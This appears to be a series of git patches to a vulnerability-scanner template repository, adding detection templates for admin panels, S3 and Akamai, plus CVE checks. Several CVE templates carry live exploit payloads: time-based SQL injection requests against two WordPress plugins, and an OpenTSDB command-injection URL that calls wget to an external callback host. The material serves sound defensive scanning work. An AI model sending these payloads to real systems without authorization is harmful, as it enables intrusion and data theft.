x_cache + words: + - "deploy.akamai" From fecebcd2c54ed1dcc936f12e8bbba6e04793c444 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 1 Jan 2023 16:27:22 +0530 Subject: [PATCH 0691/1133] improved aws s3 bucket detection template --- technologies/s3-detect.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/technologies/s3-detect.yaml b/technologies/s3-detect.yaml index 3ed37bb68e..80d6300a8f 100644 --- a/technologies/s3-detect.yaml +++ b/technologies/s3-detect.yaml @@ -10,8 +10,16 @@ requests: - method: GET path: - "{{BaseURL}}/%c0" + + matchers-condition: or matchers: - type: regex + part: body regex: - "(?:InvalidURI|InvalidArgument|NoSuchBucket)" - part: body + + - type: dsl + dsl: + - 'contains(to_lower(server), "amazons3")' + - 'contains(to_lower(header), "x-amz-id")' + - 'contains(to_lower(header), "x-amz-request-id")' \ No newline at end of file From 501bfd96c3320441d1073670a256a6a5e95d1b1f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 1 Jan 2023 16:30:15 +0530 Subject: [PATCH 0692/1133] adding more reference --- technologies/akamai-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/akamai-detect.yaml b/technologies/akamai-detect.yaml index 01de7b67b8..6befa6e7f2 100644 --- a/technologies/akamai-detect.yaml +++ b/technologies/akamai-detect.yaml @@ -7,6 +7,7 @@ info: reference: - https://support.globaldots.com/hc/en-us/articles/115003996705-Akamai-Pragma-Headers-overview - https://community.akamai.com/customers/s/article/Using-Akamai-Pragma-headers-to-investigate-or-troubleshoot-Akamai-content-delivery?language=en_US + - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ tags: akamai,cdn,tech From a205570edf952e14d23e9d06fc295f1383d1ddfe Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Sun, 1 Jan 2023 18:16:16 +0530 Subject: [PATCH 0693/1133] Added template for CVE-2022-0784 --- cves/2022/CVE-2022-0784.yaml | 39 ++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2022/CVE-2022-0784.yaml diff --git a/cves/2022/CVE-2022-0784.yaml b/cves/2022/CVE-2022-0784.yaml new file mode 100644 index 0000000000..b4402d3584 --- /dev/null +++ b/cves/2022/CVE-2022-0784.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-0784 + +info: + name: Title Experiments Free < 9.0.1 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The Title Experiments Free WordPress plugin before 9.0.1 does not sanitise and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection. + reference: + - https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f + - https://wordpress.org/plugins/wp-experiments-free/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0784 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0784 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-experiments-free,unauth + +requests: + - raw: + - | + @timeout: 10s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je) + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "{\"images\":")' + condition: and \ No newline at end of file From 9b0c4160ac92051eda561f1b412e840460f61139 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Sun, 1 Jan 2023 18:19:23 +0530 Subject: [PATCH 0694/1133] Yamllint fix --- cves/2022/CVE-2022-0784.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-0784.yaml b/cves/2022/CVE-2022-0784.yaml index b4402d3584..db0572bd03 100644 --- a/cves/2022/CVE-2022-0784.yaml +++ b/cves/2022/CVE-2022-0784.yaml @@ -27,7 +27,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je) + action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je) matchers: - type: dsl From 39d13db9a1d7e24371bbff5d0000f45b54b9afaa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 2 Jan 2023 04:02:10 +0000 Subject: [PATCH 0695/1133] Auto WordPress Plugins Update [Mon Jan 2 04:02:10 UTC 2023] :robot: --- helpers/wordpress/plugins/so-widgets-bundle.txt | 2 +- helpers/wordpress/plugins/tablepress.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt index 241e887d6f..9592b2f94b 100644 --- a/helpers/wordpress/plugins/so-widgets-bundle.txt +++ b/helpers/wordpress/plugins/so-widgets-bundle.txt @@ -1 +1 @@ -1.46.0 \ No newline at end of file +1.46.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index 10bf840ed5..f93ea0ca33 100644 --- a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -2.0.1 \ No newline at end of file +2.0.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 7b8ae8d79c..c985b8dd6e 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -13.2.10 \ No newline at end of file +13.2.11 \ No newline at end of file From 00310fa4c91f5f8469080c38a7941b9617fbebe7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 2 Jan 2023 04:21:38 +0000 Subject: [PATCH 0696/1133] Auto WordPress Plugins Update [Mon Jan 2 04:21:38 UTC 2023] :robot: --- helpers/wordpress/plugins/so-widgets-bundle.txt | 2 +- helpers/wordpress/plugins/tablepress.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt index 241e887d6f..9592b2f94b 100644 --- a/helpers/wordpress/plugins/so-widgets-bundle.txt +++ b/helpers/wordpress/plugins/so-widgets-bundle.txt @@ -1 +1 @@ -1.46.0 \ No newline at end of file +1.46.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index 10bf840ed5..f93ea0ca33 100644 --- a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -2.0.1 \ No newline at end of file +2.0.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 7b8ae8d79c..c985b8dd6e 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -13.2.10 \ No newline at end of file +13.2.11 \ No newline at end of file From 921462cfe1bad59bcd27794f423726ebc50cbf11 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Jan 2023 14:46:58 +0530 Subject: [PATCH 0697/1133] removed-interact-url --- cves/2020/CVE-2020-35476.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index 866fd32df3..e6ba83b9f1 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -19,24 +19,24 @@ info: requests: - method: GET path: - - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json" + - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - plotted - timing - cachehit - part: body condition: and - type: word + part: header words: - application/json - part: header -# Enhanced by mp on 2022/04/28 + - type: status + status: + - 200 From 094a358a9e2659b378a080d12c73956fb97a9c20 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 2 Jan 2023 14:51:39 +0530 Subject: [PATCH 0698/1133] added metadata --- cves/2020/CVE-2020-35476.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index e6ba83b9f1..922bb0e7b4 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -4,7 +4,8 @@ info: name: OpenTSDB <= 2.4.0 - Remote Code Execution author: pikpikcu severity: critical - description: OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. + description: | + OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. reference: - https://github.com/OpenTSDB/opentsdb/issues/2051 - https://nvd.nist.gov/vuln/detail/CVE-2020-35476 @@ -14,6 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35476 cwe-id: CWE-78 + metadata: + verified: true + shodan-query: html:"OpenTSDB" tags: cve,cve2020,opentsdb,rce requests: From 1d86f0b72fb78d0f52818ed295803f56bf3b85b6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Jan 2023 15:03:06 +0530 Subject: [PATCH 0700/1133] added regex --- cves/2021/CVE-2021-28151.yaml | 26 +++++++++++--------------- 1 file changed, 11 insertions(+), 15 deletions(-) diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml index 7a40803175..e504c64b61 100644 --- a/cves/2021/CVE-2021-28151.yaml +++ b/cves/2021/CVE-2021-28151.yaml @@ -39,21 +39,17 @@ requests: matchers-condition: and matchers: + - type: regex + regex: + - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' + + - type: word + part: header + words: + - "text/html" + - "application/x-www-form-urlencoded" + condition: or + - type: status status: - 200 - - - type: word - words: - - "text/html" - part: header - - - type: word - words: - - "uid=" - - "gid=" - - "groups=" - part: body - condition: and - -# Enhanced by mp on 2022/07/15 From 9bfe8e4b3ff9e9c8f685987726685fa4fbdfb8b2 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Mon, 2 Jan 2023 18:31:31 +0530 Subject: [PATCH 0702/1133] Added template for CVE-2021-24946 --- cves/2021/CVE-2021-24946.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-24946.yaml diff --git a/cves/2021/CVE-2021-24946.yaml b/cves/2021/CVE-2021-24946.yaml new file mode 100644 index 0000000000..03b4012353 --- /dev/null +++ b/cves/2021/CVE-2021-24946.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-24946 + +info: + name: Modern Events Calendar < 6.1.5 - Unauthenticated Blind SQL Injection + author: theamanrawat + severity: critical + description: | + The plugin does not sanitise and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue. + reference: + - https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445 + - https://wordpress.org/plugins/modern-events-calendar-lite/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24946 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,unauth + +requests: + - raw: + - | + @timeout: 10s + GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "The event is finished")' + condition: and \ No newline at end of file From ef3ad4891017932ae538bcae3d682552e75116f5 Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Tue, 3 Jan 2023 02:29:00 +0000 Subject: [PATCH 0703/1133] Create mpftvc-admin-panel.yaml --- exposed-panels/mpftvc-admin-panel.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/mpftvc-admin-panel.yaml diff --git a/exposed-panels/mpftvc-admin-panel.yaml b/exposed-panels/mpftvc-admin-panel.yaml new file mode 100644 index 0000000000..c0da96fc22 --- /dev/null +++ b/exposed-panels/mpftvc-admin-panel.yaml @@ -0,0 +1,25 @@ +id: mpftvc-admin-panel + +info: + name: MPFTVC Admin Login Panel + author: Hardik-Solanki + severity: info + metadata: + verified: true + shodan-query: title:"AdminLogin" + tags: panel,mpftvc,adminlogin + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "AdminLogin - MPFTVC" + + - type: status + status: + - 200 From 1b1dbb440874eec8c26a7ed4a3d3455cffe41021 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 3 Jan 2023 04:02:29 +0000 Subject: [PATCH 0704/1133] Auto WordPress Plugins Update [Tue Jan 3 04:02:29 UTC 2023] :robot: --- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/cookie-law-info.txt | 2 +- helpers/wordpress/plugins/woocommerce-services.txt | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index e72ec4fec6..c745147036 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -3.1.21 \ No newline at end of file +3.1.22 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt index 3a8b97174c..e46454be8c 100644 --- a/helpers/wordpress/plugins/cookie-law-info.txt +++ b/helpers/wordpress/plugins/cookie-law-info.txt @@ -1 +1 @@ -3.0.7 \ No newline at end of file +3.0.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt index 50aea0e7ab..7c32728738 100644 --- a/helpers/wordpress/plugins/woocommerce-services.txt +++ b/helpers/wordpress/plugins/woocommerce-services.txt @@ -1 +1 @@ -2.1.0 \ No newline at end of file +2.1.1 \ No newline at end of file From d7101f7092590903e8fb21bdf3133197a3ed8d4b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 3 Jan 2023 11:47:26 +0530 Subject: [PATCH 0705/1133] verified-added --- token-spray/api-zerbounce.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/token-spray/api-zerbounce.yaml b/token-spray/api-zerbounce.yaml index 3054d818da..5c6df26997 100644 --- a/token-spray/api-zerbounce.yaml +++ b/token-spray/api-zerbounce.yaml @@ -6,6 +6,8 @@ info: severity: info reference: - https://www.zerobounce.net/docs/email-validation-api-quickstart + metadata: + verified: true tags: token-spray,zerobounce self-contained: true From c320b679f5490a487c603db6f142080dfd22cf46 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 3 Jan 2023 11:53:33 +0530 Subject: [PATCH 0706/1133] fixed-matcher --- token-spray/api-zerbounce.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/token-spray/api-zerbounce.yaml b/token-spray/api-zerbounce.yaml index 5c6df26997..3871e85054 100644 --- a/token-spray/api-zerbounce.yaml +++ b/token-spray/api-zerbounce.yaml @@ -19,7 +19,7 @@ requests: - type: word part: body words: - - '"total"' - - '"status"' - - '"date"' + - '"total":' + - '"start_date":' + - '"end_date":' condition: and From 341afe474bc6bdcd3131018cd2bd3cddfe78084f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 3 Jan 2023 17:05:04 +0530 Subject: [PATCH 0707/1133] Update CVE-2021-24946.yaml --- cves/2021/CVE-2021-24946.yaml | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/cves/2021/CVE-2021-24946.yaml b/cves/2021/CVE-2021-24946.yaml index 03b4012353..64f254de11 100644 --- a/cves/2021/CVE-2021-24946.yaml +++ b/cves/2021/CVE-2021-24946.yaml @@ -1,7 +1,7 @@ id: CVE-2021-24946 info: - name: Modern Events Calendar < 6.1.5 - Unauthenticated Blind SQL Injection + name: Modern Events Calendar < 6.1.5 - Blind SQL Injection author: theamanrawat severity: critical description: | @@ -11,13 +11,10 @@ info: - https://wordpress.org/plugins/modern-events-calendar-lite/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24946 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2021-24946 - cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,unauth + tags: cve,cve2021,wordpress,wp-plugin,wp,sqli,modern-events-calendar-lite,unauth requests: - raw: @@ -30,7 +27,7 @@ requests: - type: dsl dsl: - 'duration>=6' - - 'status_code == 200' + - 'status_code == 200 || status_code == 500' - 'contains(content_type, "text/html")' - - 'contains(body, "The event is finished")' - condition: and \ No newline at end of file + - 'contains(body, "The event is finished") || contains(body, "been a critical error")' + condition: and From 237c918af637fb6a53b110d54dea212d1d1e836a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 3 Jan 2023 17:26:30 +0530 Subject: [PATCH 0709/1133] Update CVE-2022-0784.yaml --- cves/2022/CVE-2022-0784.yaml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-0784.yaml b/cves/2022/CVE-2022-0784.yaml index db0572bd03..6588a9b056 100644 --- a/cves/2022/CVE-2022-0784.yaml +++ b/cves/2022/CVE-2022-0784.yaml @@ -11,13 +11,10 @@ info: - https://wordpress.org/plugins/wp-experiments-free/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0784 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-0784 - cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-experiments-free,unauth + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-experiments-free,unauth requests: - raw: @@ -36,4 +33,4 @@ requests: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "{\"images\":")' - condition: and \ No newline at end of file + condition: and From 933a130616e4bf011d9c0961eaef8156e0f85144 Mon Sep 17 00:00:00 2001 From: William Soderberg Date: Tue, 3 Jan 2023 15:05:33 +0100 Subject: [PATCH 0710/1133] optimizely admin panel detection --- exposed-panels/optimizely-login.yaml | 30 ++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposed-panels/optimizely-login.yaml diff --git a/exposed-panels/optimizely-login.yaml b/exposed-panels/optimizely-login.yaml new file mode 100644 index 0000000000..3461eaeaa6 --- /dev/null +++ b/exposed-panels/optimizely-login.yaml @@ -0,0 +1,30 @@ +id: optimizely-login +info: + name: Optimizely Admin Panel + author: William Söderberg @ WithSecure + severity: info + description: Optimizely CMS was detected. Optimizely CMS was formerly known as Episerver. + reference: https://docs.developers.optimizely.com/content-cloud/v12.0.0-content-cloud/docs/changing-edit-and-admin-view-urls + metadata: + google-query: intext:"When you log in, cookies will be used" + tags: panel,optimizely,episerver +requests: + - method: GET + path: + - "{{BaseURL}}/episerver/cms" + redirects: true + max-redirects: 1 + matchers: + - type: status + status: + - 302 + - type: word + words: + - "Util/Login?ReturnUrl=%2Fepiserver%2Fcms" + part: header + extractors: + - type: regex + part: body + regex: + - "/EPiServer/Shell/(\\d+\\.\\d+\\.\\d+)/" + group: 1 \ No newline at end of file From f168c78a30a966a671b3a3fcd693e993a3edcc6e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 3 Jan 2023 20:02:29 +0530 Subject: [PATCH 0711/1133] format update and lint fix --- exposed-panels/optimizely-login.yaml | 22 ++++++++++++++-------- 1 file changed, 14 insertions(+), 8 deletions(-) diff --git a/exposed-panels/optimizely-login.yaml b/exposed-panels/optimizely-login.yaml index 3461eaeaa6..28c564b5ce 100644 --- a/exposed-panels/optimizely-login.yaml +++ b/exposed-panels/optimizely-login.yaml @@ -1,30 +1,36 @@ id: optimizely-login + info: name: Optimizely Admin Panel author: William Söderberg @ WithSecure severity: info description: Optimizely CMS was detected. Optimizely CMS was formerly known as Episerver. - reference: https://docs.developers.optimizely.com/content-cloud/v12.0.0-content-cloud/docs/changing-edit-and-admin-view-urls + reference: + - https://docs.developers.optimizely.com/content-cloud/v12.0.0-content-cloud/docs/changing-edit-and-admin-view-urls metadata: google-query: intext:"When you log in, cookies will be used" tags: panel,optimizely,episerver + requests: - method: GET path: - "{{BaseURL}}/episerver/cms" + redirects: true max-redirects: 1 matchers: - - type: status - status: - - 302 - type: word - words: + words: - "Util/Login?ReturnUrl=%2Fepiserver%2Fcms" part: header + + - type: status + status: + - 302 + extractors: - - type: regex - part: body + - type: regex + part: body regex: - "/EPiServer/Shell/(\\d+\\.\\d+\\.\\d+)/" - group: 1 \ No newline at end of file + group: 1 From 8161c1f226f43314ea4f4b78d153c68cc218f39c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 3 Jan 2023 20:06:42 +0530 Subject: [PATCH 0712/1133] lint fix --- exposed-panels/optimizely-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/optimizely-login.yaml b/exposed-panels/optimizely-login.yaml index 28c564b5ce..b71442bb2c 100644 --- a/exposed-panels/optimizely-login.yaml +++ b/exposed-panels/optimizely-login.yaml @@ -5,7 +5,7 @@ info: author: William Söderberg @ WithSecure severity: info description: Optimizely CMS was detected. Optimizely CMS was formerly known as Episerver. - reference: + reference: - https://docs.developers.optimizely.com/content-cloud/v12.0.0-content-cloud/docs/changing-edit-and-admin-view-urls metadata: google-query: intext:"When you log in, cookies will be used" @@ -31,6 +31,6 @@ requests: extractors: - type: regex part: body + group: 1 regex: - "/EPiServer/Shell/(\\d+\\.\\d+\\.\\d+)/" - group: 1 From 54fe61904e8b79147bcc6b855a0c6f093315fa0a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 3 Jan 2023 20:34:42 +0530 Subject: [PATCH 0713/1133] metadata-changed --- exposed-panels/mpftvc-admin-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/mpftvc-admin-panel.yaml b/exposed-panels/mpftvc-admin-panel.yaml index c0da96fc22..7b4dfc092c 100644 --- a/exposed-panels/mpftvc-admin-panel.yaml +++ b/exposed-panels/mpftvc-admin-panel.yaml @@ -6,8 +6,8 @@ info: severity: info metadata: verified: true - shodan-query: title:"AdminLogin" - tags: panel,mpftvc,adminlogin + shodan-query: title:"AdminLogin - MPFTVC" + tags: panel,mpftvc,admin requests: - method: GET From a51c483b73a03edc66b54b142541712da55f3271 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 4 Jan 2023 04:02:28 +0000 Subject: [PATCH 0714/1133] Auto WordPress Plugins Update [Wed Jan 4 04:02:28 UTC 2023] :robot: --- helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt | 2 +- helpers/wordpress/plugins/facebook-for-woocommerce.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/post-smtp.txt | 2 +- helpers/wordpress/plugins/premium-addons-for-elementor.txt | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt index 10724e0b42..318956c3d5 100644 --- a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt +++ b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt @@ -1 +1 @@ -3.18.1 \ No newline at end of file +3.19 \ No newline at end of file diff --git a/helpers/wordpress/plugins/facebook-for-woocommerce.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt index 8ffc1ad640..3a8b97174c 100644 --- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt +++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt @@ -1 +1 @@ -3.0.6 \ No newline at end of file +3.0.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 8191138914..ecedc98d1d 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.3.0 \ No newline at end of file +4.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index 6b4d157738..c0943d3e98 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.2.3 \ No newline at end of file +2.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index d704a500a9..403b34f56d 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.9.45 \ No newline at end of file +4.9.46 \ No newline at end of file From 8e38d023065959b1efc88cfb9c630307ff6e6117 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 4 Jan 2023 12:55:04 +0530 Subject: [PATCH 0715/1133] change-formatting --- network/detection/pgsql-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml index 6b4ea19033..b3b377e0b6 100644 --- a/network/detection/pgsql-detect.yaml +++ b/network/detection/pgsql-detect.yaml @@ -6,12 +6,12 @@ info: severity: info description: | PostgreSQL, also known as Postgres, is a free and open-source relational database management system emphasizing extensibility and SQL compliance. - metadata: - verified: true - shodan-query: port:5432 product:"PostgreSQL" reference: - https://www.postgresql.org/docs/current/errcodes-appendix.html - https://www.postgresql.org/docs/current/client-authentication-problems.html + metadata: + verified: true + shodan-query: port:5432 product:"PostgreSQL" tags: network,postgresql,db network: From ab273233e392361a747155d6351e4f3b6ae89fe7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 4 Jan 2023 07:47:03 +0000 Subject: [PATCH 0716/1133] Auto README Update [Wed Jan 4 07:47:03 UTC 2023] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e48399c704..aa52baade0 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | | tech | 360 | princechaddha | 153 | file | 78 | | | | | -**335 directories, 5229 files**. +**335 directories, 5238 files**. From 20722d7fe997282fe29dca2208176fbfcc204eaf Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 4 Jan 2023 13:51:17 +0530 Subject: [PATCH 0717/1133] Netsparker Enterprise Installer --- .../netsparker-enterprise-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/installer/netsparker-enterprise-installer.yaml diff --git a/misconfiguration/installer/netsparker-enterprise-installer.yaml b/misconfiguration/installer/netsparker-enterprise-installer.yaml new file mode 100644 index 0000000000..eef80cd54a --- /dev/null +++ b/misconfiguration/installer/netsparker-enterprise-installer.yaml @@ -0,0 +1,33 @@ +id: netsparker-enterprise-installer + +info: + name: Netsparker Enterprise Installer + author: pussycat0x + severity: info + metadata: + verified: true + shodan-query: title:"Install concrete" + tags: misconfig,exposure,install,netsparker + +requests: + - method: GET + path: + - "{{BaseURL}}/wizard/database/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Netsparker Enterprise - Installation Wizard" + - "Netsparker Ltd" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 \ No newline at end of file From 61592b635e2e5436e2433dae541dc9874c1a872f Mon Sep 17 00:00:00 2001 From: 